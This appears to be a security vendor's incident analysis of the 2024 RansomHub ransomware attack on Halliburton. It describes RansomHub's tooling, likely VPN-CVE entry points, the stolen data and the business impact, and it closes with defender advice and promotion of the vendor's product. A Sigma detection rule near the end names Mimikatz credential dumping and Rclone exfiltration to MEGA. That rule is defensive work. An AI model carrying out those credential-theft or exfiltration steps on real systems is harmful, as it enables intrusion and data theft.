On August 21, 2024, Halliburton — the $23 billion oilfield services company that drills, fracks, and services wells across 70 countries — detected unauthorised access on its corporate network. Two days later, the company filed an SEC Form 8-K disclosing the cybersecurity incident, took portions of its IT environment offline, and began routing some customer-facing operations through manual workarounds. RansomHub, a ransomware-as-a-service crew that emerged in February 2024, ultimately claimed responsibility and listed Halliburton on its dark-web leak site. In Halliburton's November 5, 2024 Form 10-Q, the company disclosed $35 million in pre-tax expenses tied to the incident — a comparatively modest figure beside Change Healthcare's billions, but a useful reminder that energy-sector IT outages cascade into oilfield delays, customer billing freezes, and ESG-disclosure obligations.
Who is RansomHub?
RansomHub appeared on February 2, 2024 with a slick affiliate-recruitment post on the Russian-language RAMP forum, immediately offering affiliates a 90/10 split (in their favour) and a Rust-based encryptor that targets Windows, Linux, ESXi, and FreeBSD. CISA Joint Advisory AA24-242A (August 29, 2024) tied RansomHub to over 210 victims in its first six months, picking up many ex-ALPHV/BlackCat and ex-LockBit affiliates orphaned by 2024 takedowns. RansomHub's tradecraft is unremarkable but effective: SocGholish or Atomic Stealer for initial access, ScreenConnect or AnyDesk for persistence, Mimikatz and Impacket for lateral movement, Rclone or MEGAcmd for exfiltration, and a Rust-based encryptor that uses Curve25519-paired x25519/ChaCha20 hybrid encryption. Mandiant tracks the cluster as UNC4194.
How did they get into Halliburton?
Halliburton has not publicly described the entry vector. Open-source reporting (Bleeping Computer, August 28; SecurityWeek, August 29; CPO Magazine analysis) identifies two plausible pathways: a SocGholish drive-by-download via a fake Chrome update on a poisoned oil-and-gas industry-news website, and exploitation of a Halliburton-facing VPN appliance. The latter is consistent with RansomHub's AA24-242A TTPs that name CVE-2023-3519 (Citrix NetScaler), CVE-2023-27997 (Fortinet SSL-VPN), and CVE-2023-46805/CVE-2024-21887 (Ivanti Connect Secure) as preferred entry points. From initial access, the AA24-242A advisory notes RansomHub affiliates typically reach domain admin within 6-9 hours using stolen Kerberos tickets and tooling like SharpHound and BloodHound.
What did they steal?
Halliburton's Form 8-K/A filing on August 30, 2024 confirmed "data has been taken from the company's systems." RansomHub posted a teaser on September 1 listing engineering schematics, customer reservoir-engineering reports, and pricing models. The dump on the leak site (later retracted in late September after presumed negotiation closed) referenced "sensitive blueprints and proprietary industrial data" — language echoed in Halliburton's Form 10-Q. The 10-Q expressly says the company has not paid a ransom, but multiple media outlets reported RansomHub took the listing down anyway, possibly after the data lost commercial value or after FBI engagement.
How did business operations break?
Unlike a Colonial Pipeline-class OT incident, Halliburton's drilling and well-service field operations themselves continued. The damage was at the IT-business interface: customer invoicing was delayed (some clients reported 4-6 week billing windows), procurement systems on SAP S/4HANA were offline for portions of the recovery, and the company's PerformanceWell SaaS platform — used by E&P customers to share reservoir telemetry with Halliburton engineers — had segments of its API offline for nine business days. The Form 10-Q quantifies the impact at $0.02 per diluted share for Q3, mostly response costs (incident-response retainers, forensics, customer-notification operations) plus working-capital effects from delayed receivables.
How long was dwell time?
Halliburton has not disclosed first-seen indicators. Industry threat-intel reports place RansomHub's median dwell in 2024 between 6 and 14 days. Mandiant's M-Trends 2024, published April 23 2024, gave the broader ransomware ecosystem median dwell at 13 days, down from 16 in 2023. Mandiant also noted that energy-sector dwell times skew shorter than average because OT-segmented IT networks are less rich in lateral-movement paths — attackers detonate sooner because there is less to discover.
Why does the energy-sector supply chain need to learn from this?
The $35 million dollar figure understates the strategic risk. Halliburton's PerformanceWell and Landmark software platforms are deeply embedded in customer drilling decisions; ExxonMobil, Chevron, and Saudi Aramco depend on weekly data syncs. A multi-week PerformanceWell outage cascades into delayed casing-design decisions, postponed perforation jobs, and renegotiated rig contracts. Energy-sector SaaS is the new pipeline software, and CISA's 2024 Energy Sector Risk Profile (October 2024) explicitly warns that ransomware against oilfield-services providers is the new pre-positioning vector for sector-wide disruption.
# Detection: RansomHub TTPs observed at energy-sector victims (CISA AA24-242A)
title: RansomHub Mimikatz + Rclone Exfil Sequence
id: ransomhub-energy-2024
detection:
selection_creds:
Image|endswith: '\mimikatz.exe'
CommandLine|contains: 'sekurlsa::logonpasswords'
selection_exfil:
Image|endswith: '\rclone.exe'
CommandLine|contains:
- 'mega:'
- 'config'
condition: selection_creds and selection_exfil within 48h
level: high
What should energy-sector defenders do?
Five actions. First, treat customer-facing SaaS platforms (Landmark, PerformanceWell, OFS Portal) as critical infrastructure and require RTO commitments tighter than 72 hours. Second, eliminate flat IT environments — drilling-data backbones, billing platforms, and ESG-reporting systems must be segmented from corporate Active Directory. Third, audit every VPN appliance against the AA24-242A IOC list and the CISA KEV catalogue; CVE-2023-3519, CVE-2023-27997, CVE-2024-21887 remain frequently unpatched in the sector. Fourth, build dual-control on Active Directory tier-0 changes — RansomHub's domain-admin pivot relies on single-operator privilege. Fifth, add explicit ransomware-recovery and material-cybersecurity-incident clauses (SEC Item 1.05) into supplier contracts; the SEC's December 2023 amended rule already requires four-business-day disclosure but supplier obligations lag.
How Safeguard Helps
Safeguard maps energy-sector IT and OT-adjacent software supply chains and continuously cross-references components against CISA KEV, RansomHub TTP advisories (AA24-242A), and Mandiant UNC4194 reporting — so the moment a vendor like Halliburton, Schlumberger, or Baker Hughes is implicated, every customer can identify shared-component exposure in minutes. Griffin AI's reachability engine prioritises CVEs that are actually exploitable from corporate VLANs versus those isolated in offline drilling-data networks. TPRM scoring tracks each oilfield-services supplier against the CISA Secure by Design pledge, the DOE's Energy Threat Analysis Center reports, and SEC Item 1.05 disclosure cadence, downgrading vendors who fail to publish four-business-day notifications. Policy gates block any new energy-platform release that embeds a KEV-listed Citrix, Fortinet, or Ivanti component, and ingest VEX statements from device manufacturers so incident responders have a clean prioritised view during the next AA24-242A-class campaign.